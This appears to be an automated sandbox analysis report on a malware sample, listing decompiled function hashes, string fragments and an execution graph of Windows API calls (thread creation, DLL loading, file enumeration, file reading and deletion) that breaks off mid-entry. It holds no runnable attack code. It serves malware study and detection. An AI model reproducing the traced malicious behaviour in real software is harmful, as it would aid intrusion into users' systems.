                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d51cfc5dfc2561f51f77a6a56745b418c067be914514ca88d1040e21cba96d0d
                                                                                                                        • Instruction ID: 15d2eaaa1f4ccff24548fadca8fcadb86b6588a593be08e54540e1fe2a5d5eb3
                                                                                                                        • Opcode Fuzzy Hash: d51cfc5dfc2561f51f77a6a56745b418c067be914514ca88d1040e21cba96d0d
                                                                                                                        • Instruction Fuzzy Hash: 0BF0B4736202125BD720DE5DECC4B9AF79CEB84334F140122F998CB351D672D4D587A0
                                                                                                                        Function 0327A8BC Relevance: .0, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4a294e9bbd7cd18622ef583e3dde76e6d49726dbffdc308a69a4ca2b3d55d71f
                                                                                                                        • Instruction ID: cd624192158945fffe91768eb4af9322c3dec3ef5e406fe90b303ce54112caf7
                                                                                                                        • Opcode Fuzzy Hash: 4a294e9bbd7cd18622ef583e3dde76e6d49726dbffdc308a69a4ca2b3d55d71f
                                                                                                                        • Instruction Fuzzy Hash: FFF01CBA2106187BD714EFA9DC45EDB77ADEFC9750F004019BA18A7241D670F9218BB4
                                                                                                                        Function 03269FFC Relevance: .0, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7fed1a80514c6fa1db7863ae72c74f853bda333c2cdb1dfbf31e523ce395b631
                                                                                                                        • Instruction ID: d79ad3bcc95d9b4eafa2a7e28e7f8a58077dbf28308698651dde6cd74fea8e7e
                                                                                                                        • Opcode Fuzzy Hash: 7fed1a80514c6fa1db7863ae72c74f853bda333c2cdb1dfbf31e523ce395b631
                                                                                                                        • Instruction Fuzzy Hash: ECF082B1815209EBDB14CFA4D881BDEBBB8EF04320F1083ADE8259B280D63597908781
                                                                                                                        Function 0327B5EC Relevance: .0, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                        • Instruction ID: bc048e14b3bb03f9d67625e99e6557bbbd98118a4a1d8195064453a611ebc990
                                                                                                                        • Opcode Fuzzy Hash: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                        • Instruction Fuzzy Hash: 98E06DB62103047BD614EE69EC44E9B37ACEF89750F004018FA08AB241D671B9108BB4
                                                                                                                        Function 0327D46C Relevance: .0, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3b4b4e618b940305639aab7a69cecd77c9f8237aa11e509674f24fa6eb5e0e4a
                                                                                                                        • Instruction ID: ebf47b55a424c4a857b27a6aa400aca154f783ad5f410c87ee1d0a5dcb788e5c
                                                                                                                        • Opcode Fuzzy Hash: 3b4b4e618b940305639aab7a69cecd77c9f8237aa11e509674f24fa6eb5e0e4a
                                                                                                                        • Instruction Fuzzy Hash: 98E04F3661021437C220A59ADC55FA7F75CAFC5A60F094064FE08AB240E5B0B98082E8
                                                                                                                        Function 03269FFA Relevance: .0, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4535a27cda2117cbc5823093b09212ee6cd9c8fd5f63c365e5771b904de907f5
                                                                                                                        • Instruction ID: a47fa2ca377224bdfcc8e86085a0e8b8956a8049e436b6a8fba82aae6a1a9bf4
                                                                                                                        • Opcode Fuzzy Hash: 4535a27cda2117cbc5823093b09212ee6cd9c8fd5f63c365e5771b904de907f5
                                                                                                                        • Instruction Fuzzy Hash: 57F06571925208EADB14CF64E481BEDBBB8EF49320F10837EE815DB240D23597908741
                                                                                                                        Function 0327B2AC Relevance: .0, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                        • Instruction ID: d4bae8aa3b947e436beb9b964d578c0aac5eef701d291f1ce73718a4ddfe97ba
                                                                                                                        • Opcode Fuzzy Hash: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                        • Instruction Fuzzy Hash: 7DE04F3A2102147BD510FA6AEC00F9B77ADEBC5760F004415FA096B141C671B90187B1

                                                                                                                        Non-executed Functions

                                                                                                                        Function 03265E2F Relevance: 51.4, Strings: 41, Instructions: 171COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                                        • API String ID: 0-3248090998
                                                                                                                        • Opcode ID: 697d7d16f34b037cfd4c43316d0f4ab32f3fd68dfc118f18219722a50e2c7810
                                                                                                                        • Instruction ID: 3e2e6070b0ca85b873b48c323b732d18ad0cd9723d3859e1dd2e2d7dbcaa1980
                                                                                                                        • Opcode Fuzzy Hash: 697d7d16f34b037cfd4c43316d0f4ab32f3fd68dfc118f18219722a50e2c7810
                                                                                                                        • Instruction Fuzzy Hash: 7491F0F09052A98ECB118F5595603DFBF71BB95204F1581E9C6A97B203C3BE4E86DF90
                                                                                                                        Function 032748BC Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                        • API String ID: 0-1002149817
                                                                                                                        • Opcode ID: 1480ef4aef5cf225c1bd758ec0da3458b251789a193661d25ee5ecf857535f62
                                                                                                                        • Instruction ID: 61e4f7220361c3170508086a4b7d879605af70519c987253f7ac1ae8b2577251
                                                                                                                        • Opcode Fuzzy Hash: 1480ef4aef5cf225c1bd758ec0da3458b251789a193661d25ee5ecf857535f62
                                                                                                                        • Instruction Fuzzy Hash: 3BC12EB5D113689EDB21DFA4CC44BEEBBB8AF05304F1081D9D50CAB241E7B55A88CFA5
                                                                                                                        Function 0325C75C Relevance: 15.1, Strings: 12, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: >$'$P$Z$[$e$m$r$r$y$zt$'
                                                                                                                        • API String ID: 0-1917272414
                                                                                                                        • Opcode ID: 7ed4c6ac64ad6a6ceb354e2e409e5161114cc2c521d7eb2f1540d533ebb74d06
                                                                                                                        • Instruction ID: 4c3931b5a18dc1718082d7aca2d90d446d787101d4bc85fc318ac4e2d86ce713
                                                                                                                        • Opcode Fuzzy Hash: 7ed4c6ac64ad6a6ceb354e2e409e5161114cc2c521d7eb2f1540d533ebb74d06
                                                                                                                        • Instruction Fuzzy Hash: 9C5158B0D05369CBEB24CF85C9597DEBFB1BB05308F108599C2583B281C7BA1A88CF95
                                                                                                                        Function 03260BD6 Relevance: 13.8, Strings: 11, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                        • API String ID: 0-685823316
                                                                                                                        • Opcode ID: f3bdde6a2960d8b2d6b1832c63901f495a2598d48b9056f9b582630838a40533
                                                                                                                        • Instruction ID: a5195f0d88b66364dda66820cb0166a705ac142a61bc0be600ff2c434469b784
                                                                                                                        • Opcode Fuzzy Hash: f3bdde6a2960d8b2d6b1832c63901f495a2598d48b9056f9b582630838a40533
                                                                                                                        • Instruction Fuzzy Hash: 50317FB5D51318AEEF50DFA0DC85BEEBBB9BF48304F04814DE6087A181DBB55648CBA4
                                                                                                                        Function 032597CC Relevance: 12.5, Strings: 10, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 2$8$8$<$Q$Z$j$w$y${
                                                                                                                        • API String ID: 0-1609194601
                                                                                                                        • Opcode ID: 5670b2ff8edca7e123c44925113381ad118cdca0ea7393fbc4525308d027c8c0
                                                                                                                        • Instruction ID: ce9841298fba4cad29145759278e06f4ca6b309cee5dbaf5e7a5ac4aa14eacd0
                                                                                                                        • Opcode Fuzzy Hash: 5670b2ff8edca7e123c44925113381ad118cdca0ea7393fbc4525308d027c8c0
                                                                                                                        • Instruction Fuzzy Hash: CA11DE10D1C7CADDDB12C7BC84087AEBF711F23254F4882D9D4A52A2D2C3794346C7A6
                                                                                                                        Function 0326CC7F Relevance: 7.7, Strings: 6, Instructions: 176COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: F$P$T$f$r$x
                                                                                                                        • API String ID: 0-2523166886
                                                                                                                        • Opcode ID: 1c30bdc5fde3e8f0472f760cc94c7950708806720de4cfc276979ea33fa31ea4
                                                                                                                        • Instruction ID: 97a2f9570a3413333b0e4c2b65a472ff6d74000f725229395dd87126a62c0fdc
                                                                                                                        • Opcode Fuzzy Hash: 1c30bdc5fde3e8f0472f760cc94c7950708806720de4cfc276979ea33fa31ea4
                                                                                                                        • Instruction Fuzzy Hash: BC51BF71920316ABDB35EB64C848BEEF7F8BF04700F04462AA5895A180E7F4A6C4CBD1
                                                                                                                        Function 0326C38C Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $i$l$o$u
                                                                                                                        • API String ID: 0-2051669658
                                                                                                                        • Opcode ID: 596b9c2338c5aa19fe15adb76090d9a0577430f48cb4e8cf965ab357200c677b
                                                                                                                        • Instruction ID: 415d81f74e80e30348211e7deca7b8c6d6a26c49e85123573215ef054d55e285
                                                                                                                        • Opcode Fuzzy Hash: 596b9c2338c5aa19fe15adb76090d9a0577430f48cb4e8cf965ab357200c677b
                                                                                                                        • Instruction Fuzzy Hash: 37615FB2A10315AFCB24DBA4CC84FEFB7BDAF88700F14455DE55AA7240D774AA84CB60
                                                                                                                        Function 0326C01A Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$k$o
                                                                                                                        • API String ID: 0-3624523832
                                                                                                                        • Opcode ID: 35f0e86a429a3ea162c65131b7b75882f9db462fbf7f1ab948eb224f7cf45ad0
                                                                                                                        • Instruction ID: 3b63bbad21bbd31d8af637f2d3fad9316fa3d07162788d304ee5ff70719599e8
                                                                                                                        • Opcode Fuzzy Hash: 35f0e86a429a3ea162c65131b7b75882f9db462fbf7f1ab948eb224f7cf45ad0
                                                                                                                        • Instruction Fuzzy Hash: C3B10F75A10309AFDB14DBA4CC85FEFB7FDAF88700F144558F65997240D674AA81CB50
                                                                                                                        Function 0326C955 Relevance: 5.2, Strings: 4, Instructions: 238COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$h$o
                                                                                                                        • API String ID: 0-3662636641
                                                                                                                        • Opcode ID: 62246e0fc81170e2e9806cb755f420c6bc66478e872f5459a9c0ba6f24a22566
                                                                                                                        • Instruction ID: cea3cdc516f5b55980550e20a7e1158dd657e3702892a1aace0aa0cd11cf77df
                                                                                                                        • Opcode Fuzzy Hash: 62246e0fc81170e2e9806cb755f420c6bc66478e872f5459a9c0ba6f24a22566
                                                                                                                        • Instruction Fuzzy Hash: 758167B6C212186AEB65EB94CC85FEF737CFF48600F004599E509A6140EBB56BC48FA1
                                                                                                                        Function 0326C01C Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$k$o
                                                                                                                        • API String ID: 0-3624523832
                                                                                                                        • Opcode ID: ad6fe1e8ba111fa7cdca3036f1de9e314fc7c19b3f3eb5c86cdcaf353eb8ae8f
                                                                                                                        • Instruction ID: 2983634a8c4c699d591fefaeed84392cf06754011bdc3775dfb5124bb5352c6a
                                                                                                                        • Opcode Fuzzy Hash: ad6fe1e8ba111fa7cdca3036f1de9e314fc7c19b3f3eb5c86cdcaf353eb8ae8f
                                                                                                                        • Instruction Fuzzy Hash: E7612F75A00309AFDB14DFA4CC84FEFB7BDAF88700F104558E6599B244D774AA81CB60
                                                                                                                        Function 0326BEDC Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                        • API String ID: 0-2877786613
                                                                                                                        • Opcode ID: d23459081a1b77cb3bcb806d0ae26695a53c59807d20048a140bd5cc22134986
                                                                                                                        • Instruction ID: abcd1e725b3a2b0538e30c103e4609519e6ad4c84d6205d417835445e3e4fc16
                                                                                                                        • Opcode Fuzzy Hash: d23459081a1b77cb3bcb806d0ae26695a53c59807d20048a140bd5cc22134986
                                                                                                                        • Instruction Fuzzy Hash: 214131B59212187FEB11FB95DC41FEF7B7CAF59600F004048F5086E180D7B4668587EA
                                                                                                                        Function 0326C95C Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$h$o
                                                                                                                        • API String ID: 0-3662636641
                                                                                                                        • Opcode ID: 388ec3809b4e17d1440dd548c569d36164c997ec3c83155a3f6c483b33c1cb22
                                                                                                                        • Instruction ID: 41b4d08759df3f5cfa9f8a6af383c7f4c3e91212ffaa6c667611f618d1858c1b
                                                                                                                        • Opcode Fuzzy Hash: 388ec3809b4e17d1440dd548c569d36164c997ec3c83155a3f6c483b33c1cb22
                                                                                                                        • Instruction Fuzzy Hash: 66415375D11319AAEB60EBA4CC41FEEB3B8FF44700F005599E509A6140EBB467C48FA5
                                                                                                                        Function 032681DC Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6$7$9$I
                                                                                                                        • API String ID: 0-601985604
                                                                                                                        • Opcode ID: 2231109d5e3abfc73912a3eb4484205bc409a222c11b547e0a50759c92bedde0
                                                                                                                        • Instruction ID: ef5bb3893248ca49c7d3db8c1e0ee70c21181723645572f59299929ff7a9996b
                                                                                                                        • Opcode Fuzzy Hash: 2231109d5e3abfc73912a3eb4484205bc409a222c11b547e0a50759c92bedde0
                                                                                                                        • Instruction Fuzzy Hash: 863134B5D20219ABEF14DBA4DD41BFE77B8FF44304F004159E908AA240E6B5AA458BE5
                                                                                                                        Function 03269583 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$k$o
                                                                                                                        • API String ID: 0-3624523832
                                                                                                                        • Opcode ID: 7b73a00d15f568ac3a696cdcee3726f364015c8d92b3dc6e6ec06a31984cb485
                                                                                                                        • Instruction ID: 6f88ed272d8a9c8eec2835233347ecfa406ef6baa5334499c0503f2a4d3d43d2
                                                                                                                        • Opcode Fuzzy Hash: 7b73a00d15f568ac3a696cdcee3726f364015c8d92b3dc6e6ec06a31984cb485
                                                                                                                        • Instruction Fuzzy Hash: B501D8B2A102089FDB14DF94D880ADEF7B9FF08704F04465DD5056F201E7729485CBA0
                                                                                                                        Function 032695E5 Relevance: 5.0, Strings: 4, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$k$o
                                                                                                                        • API String ID: 0-3624523832
                                                                                                                        • Opcode ID: e32efa3a4eca2eea4d9327ceeb98b8bc21b700f1492f836d0d767139d68c2b7c
                                                                                                                        • Instruction ID: 361b041719748cacd80778f9de1841a77a5366a1d400dc768fd1c428242b65bc
                                                                                                                        • Opcode Fuzzy Hash: e32efa3a4eca2eea4d9327ceeb98b8bc21b700f1492f836d0d767139d68c2b7c
                                                                                                                        • Instruction Fuzzy Hash: 07A00226A04921A7D7184B54A461781F7E0FA416613100AD7C2D1C882DD2214040A7C1

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:2.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:4.1%
                                                                                                                        Signature Coverage:2.2%
                                                                                                                        Total number of Nodes:461
                                                                                                                        Total number of Limit Nodes:76
                                                                                                                        execution_graph 99372 2bbbe3c 99375 2bcb0e0 99372->99375 99373 2bbbe41 99378 2bc9260 99375->99378 99377 2bcb0fb 99377->99373 99379 2bc927d 99378->99379 99380 2bc928e RtlAllocateHeap 99379->99380 99380->99377 99383 2ba9d70 99384 2ba9d7f 99383->99384 99385 2ba9dc0 99384->99385 99386 2ba9dad CreateThread 99384->99386 99387 2ba9db8 99386->99387 99388 2bb6cb0 99389 2bb6cc9 99388->99389 99392 2bb6d1c 99388->99392 99389->99392 99398 2bc8f20 99389->99398 99390 2bb6e54 99392->99390 99402 2bb60e0 NtClose LdrInitializeThunk LdrInitializeThunk 99392->99402 99394 2bb6e2e 99394->99390 99403 2bb62b0 NtClose LdrInitializeThunk LdrInitializeThunk 99394->99403 99395 2bb6ce4 99401 2bb60e0 NtClose LdrInitializeThunk LdrInitializeThunk 99395->99401 99399 2bc8f3d 99398->99399 99400 2bc8f4e NtClose 99399->99400 99400->99395 99401->99392 99402->99394 99403->99390 99404 2bb09b0 99405 2bb09bd 99404->99405 99410 2bb40f0 99405->99410 99407 2bb09e8 99408 2bb0a2d 99407->99408 99409 2bb0a1c PostThreadMessageW 99407->99409 99409->99408 99412 2bb4114 99410->99412 99411 2bb411b 99411->99407 99412->99411 99414 2bb413a 99412->99414 99417 2bcc480 LdrLoadDll 99412->99417 99415 2bb4150 LdrLoadDll 99414->99415 99416 2bb4167 99414->99416 99415->99416 99416->99407 99417->99414 99418 2bc1670 99422 2bc1689 99418->99422 99419 2bc16d1 99426 2bcb000 99419->99426 99422->99419 99423 2bc1711 99422->99423 99425 2bc1716 99422->99425 99424 2bcb000 RtlFreeHeap 99423->99424 99424->99425 99429 2bc92b0 99426->99429 99428 2bc16e1 99430 2bc92cd 99429->99430 99431 2bc92de RtlFreeHeap 99430->99431 99431->99428 99432 2bc8e70 99433 2bc8eea 99432->99433 99435 2bc8e9e 99432->99435 99434 2bc8f00 NtDeleteFile 99433->99434 99436 2bc55b0 99437 2bc5615 99436->99437 99438 2bc5650 99437->99438 99441 2bc0f80 99437->99441 99440 2bc5632 99442 2bc0f26 99441->99442 99443 2bc8f20 NtClose 99442->99443 99444 2bc0f6f 99443->99444 99444->99440 99445 2bc8d70 99446 2bc8e1a 99445->99446 99448 2bc8d9e 99445->99448 99447 2bc8e30 NtReadFile 99446->99447 99450 2bb6920 99451 2bb694a 99450->99451 99454 2bb7aa0 99451->99454 99453 2bb6971 99455 2bb7abd 99454->99455 99461 2bc8620 99455->99461 99457 2bb7b0d 99458 2bb7b14 99457->99458 99466 2bc8700 99457->99466 99458->99453 99460 2bb7b3d 99460->99453 99462 2bc864e 99461->99462 99463 2bc86be 99461->99463 99462->99457 99471 3682f30 LdrInitializeThunk 99463->99471 99464 2bc86f7 99464->99457 99467 2bc87b1 99466->99467 99469 2bc872f 99466->99469 99472 3682d10 LdrInitializeThunk 99467->99472 99468 2bc87f6 99468->99460 99469->99460 99471->99464 99472->99468 99473 2bbc160 99475 2bbc189 99473->99475 99474 2bbc28d 99475->99474 99476 2bbc233 FindFirstFileW 99475->99476 99476->99474 99477 2bbc24e 99476->99477 99478 2bbc274 FindNextFileW 99477->99478 99478->99477 99479 2bbc286 FindClose 99478->99479 99479->99474 99480 2bc12e0 99481 2bc12fc 99480->99481 99482 2bc1338 99481->99482 99483 2bc1324 99481->99483 99485 2bc8f20 NtClose 99482->99485 99484 2bc8f20 NtClose 99483->99484 99486 2bc132d 99484->99486 99487 2bc1341 99485->99487 99490 2bcb120 RtlAllocateHeap 99487->99490 99489 2bc134c 99490->99489 99491 2bc84e0 99492 2bc84fd 99491->99492 99495 3682df0 LdrInitializeThunk 99492->99495 99493 2bc8525 99495->99493 99496 2bc5be0 99497 2bc5c3a 99496->99497 99499 2bc5c47 99497->99499 99500 2bc3600 99497->99500 99507 2bcaf70 99500->99507 99502 2bc374e 99502->99499 99503 2bc363e 99503->99502 99504 2bb40f0 2 API calls 99503->99504 99506 